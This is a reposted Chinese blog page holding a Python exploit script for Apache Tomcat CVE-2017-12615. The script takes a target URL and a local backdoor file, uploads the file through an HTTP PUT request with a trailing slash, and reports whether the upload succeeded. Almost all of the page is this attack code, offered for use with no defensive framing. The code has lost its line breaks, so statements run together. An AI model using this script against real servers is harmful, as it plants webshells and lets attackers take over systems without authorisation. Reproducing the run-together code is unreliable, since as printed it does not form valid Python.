Tomcat文件写入 CVE-2017-12615 EXP
生活随笔
收集整理的這篇文章主要介紹了
Tomcat文件写入 CVE-2017-12615 EXP
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
import sys
import requestsdef title():print("[-------------------------------------------------------------]")print("[-------------- Tomcat 文件寫入漏洞 ---------------]")print("[-------- CVE-2017-12615 ----------]")print("[-------- use:python3 CVE-2017-12615.py --------]")print("[-------- Author:鳴蜩十四 ------------]")print("[-------------------------------------------------------------]")def main() :if (len(sys.argv)==1):url = input("請輸入目標(biāo)網(wǎng)站地址(http://ip:port/):")name = input("請為上傳文件命名:")path = input("請輸入后門的絕對地址:")poc(url,name,path)else :print("Example: \n python3 " + sys.argv[0] + "\n")def poc(url,name,path) :r = requests.put(url=url+name+'/',data=open(path, 'rb'),verify=False)if r.status_code == 201 :print("[+] 可能存在 Tomcat寫入漏洞,請從網(wǎng)頁查看是否上傳成功")else :print("[-] 不存在該漏洞!")if __name__ == "__main__" :title()main()
總結(jié)
以上是生活随笔為你收集整理的Tomcat文件写入 CVE-2017-12615 EXP的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 博弈论模型(威佐夫博弈)
- 下一篇: 三服务 | 浙江省委信息化管理中心领导参